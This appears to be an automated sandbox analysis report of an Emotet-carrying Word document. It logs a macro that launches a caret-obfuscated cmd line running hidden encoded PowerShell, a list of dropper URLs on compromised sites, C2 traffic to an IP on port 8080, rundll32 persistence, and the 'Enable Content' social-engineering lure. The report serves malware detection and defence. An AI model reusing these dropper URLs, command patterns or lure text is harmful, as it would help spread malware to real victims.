Source: https://armakonarms.com/wp-json/ | Avira URL Cloud: Label: malware
Source: http://coworkingplus.es | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/urun-kategori/semi-auto/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1 | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/ | Avira URL Cloud: Label: malware
Source: https://www.bimception.com/wp-admin/sHy5t/ | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/wp-content/uploads/2021/01/armakon.png | Avira URL Cloud: Label: malware
Source: http://silkonbusiness.matrixinfotechsolution.com/js/q26/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0 | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6 | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl | Avira URL Cloud: Label: malware
Source: https://armakonarms.com/xmlrpc.php?rsd | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1 | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0 | Avira URL Cloud: Label: malware
Source: http://alugrama.com.mx/t/2/ | Avira URL Cloud: Label: malware
Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4 | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: armakonarms.com | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: 79a2gzs3gkk.doc | Virustotal: Detection: 57%
Source: 79a2gzs3gkk.doc | Metadefender: Detection: 32%
Source: 79a2gzs3gkk.doc | ReversingLabs: Detection: 65%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2099358220.000000001B830000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: coworkingplus.es
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 162.241.60.240:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.21.89.78:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | String found in memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div>
Source: powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmp | String found in memory: http://coworkingplus.es/wp-admin/FxmME/!http://silkonbusiness.matrixinfotechsolution.com/js/q26/!https://bbjugueteria.com/s6kscx/Z/!https://www.bimception.com/wp-admin/sHy5t/!http://armakonarms.com/wp-includes/fz/!http://alugrama.com.mx/t/2/!http://homecass.com/wp-content/iF/
Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 195.159.28.230:8080
Source: global traffic | HTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1 | Host: coworkingplus.es | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /js/q26/ HTTP/1.1 | Host: silkonbusiness.matrixinfotechsolution.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1 | Host: armakonarms.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /t/2/ HTTP/1.1 | Host: alugrama.com.mx | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 195.159.28.230
Source: Joe Sandbox View | IP Address: 69.38.130.14
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: ASN-CATCHCOMNO
Source: global traffic | HTTP traffic detected: POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1 | DNT: 0 | Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ | Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMt | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 195.159.28.230:8080 | Content-Length: 5492 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown | TCP traffic detected without corresponding DNS query: 69.38.130.14
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: unknown | TCP traffic detected without corresponding DNS query: 195.159.28.230
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E909297-30AB-4901-9D2A-3CE504568F55}.tmp
                      Source: global trafficHTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1Host: coworkingplus.esConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/q26/ HTTP/1.1Host: silkonbusiness.matrixinfotechsolution.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1Host: armakonarms.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /t/2/ HTTP/1.1Host: alugrama.com.mxConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.facebook.com (Facebook)
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | String found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.twitter.com (Twitter)
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | String found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.youtube.com (Youtube)
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknown | DNS traffic detected: queries for: coworkingplus.es
                      Source: unknown | HTTP traffic detected: POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1 DNT: 0 Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMt User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 195.159.28.230:8080 Content-Length: 5492 Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sun, 24 Jan 2021 17:03:28 GMT Server: Apache Content-Length: 315 Keep-Alive: timeout=5 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

                      E-Banking Fraud:

                      Yara detected Emotet
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4; Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4; Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4; Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 8,236 N@m 13 ;a 1009
                      Source: Document image extraction number: 0; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0; Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0; Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0; Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1; Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1; Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1; Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1; Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Very long command line found
                      Source: unknown; Process created: Commandline size = 5329
                      Source: unknown; Process created: Commandline size = 5228
                      Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 5228
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe; File created: C:\Windows\SysWOW64\Psyzc\
                      Source: 79a2gzs3gkk.doc; OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation; OLE, VBA macro: Module Tvh1u8793dltn9, Function Document_open; Name: Document_open
                      Source: 79a2gzs3gkk.doc; OLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp; rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp; rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp; rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
                      Source: classification engine; Classification label: mal100.troj.evad.winDOC@36/8@6/8
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$a2gzs3gkk.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRBF39.tmp
                      Source: 79a2gzs3gkk.doc; OLE indicator, Word Document stream: true
                      Source: 79a2gzs3gkk.doc; OLE document summary: title field not present or empty
                      Source: 79a2gzs3gkk.doc; OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............,..j.....IN...............u.............}..v.....!......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............L..j....."................u.............}..v....0#......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............,..j.....IN...............u.............}..v.....)......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............L..j.....*................u.............}..v....0+......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............,..j.....IN...............u.............}..v.....1......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............L..j.....2................u.............}..v....03......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....9......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....:................u.............}..v....0;......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....@......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j....8A................u.............}..v.....A......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v....`H......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....I................u.............}..v.....I......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....N......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....O................u.............}..v.... P......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......,..j.....IN...............u.............}..v.....S......0...............HFN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j....hT................u.............}..v.....T......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v............0.................N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v............0.................N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: 79a2gzs3gkk.doc | Virustotal: Detection: 57%
                      Source: 79a2gzs3gkk.doc | Metadefender: Detection: 32%
                      Source: 79a2gzs3gkk.doc | ReversingLabs: Detection: 65%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknown | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: unknown | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',WysFLGeRRae
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm',#1
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',ZENT
                      Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs',#1
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
